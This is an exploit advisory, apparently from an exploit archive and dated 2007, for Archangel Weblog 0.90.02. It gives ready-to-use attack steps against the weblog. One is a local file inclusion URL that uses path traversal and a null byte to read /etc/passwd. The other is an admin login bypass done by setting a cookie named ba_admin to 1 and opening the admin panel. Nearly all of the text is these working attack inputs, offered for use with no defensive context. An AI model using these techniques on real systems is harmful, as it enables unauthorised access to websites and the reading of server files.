Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns
# Published : 2007-05-05
# Author : Dj7xpl
# Previous Title : Nuked-klaN 1.7.6 Remote Code Execution Exploit
# Next Title : PHPtree 1.3 (cms2.php s_dir) Remote File Inclusion Vulnerability

\|///
                    \  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
	      Home     :  http://www.archangelmgt.com/weblog.shtml
              Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
	      Author   :  Dj7xpl / Dj7xpl@2600.ir
	      HomePage :  http://Dj7xpl.2600.ir
	      Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                    (       ) /
                    _)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

# www.Syue.com [2007-05-05]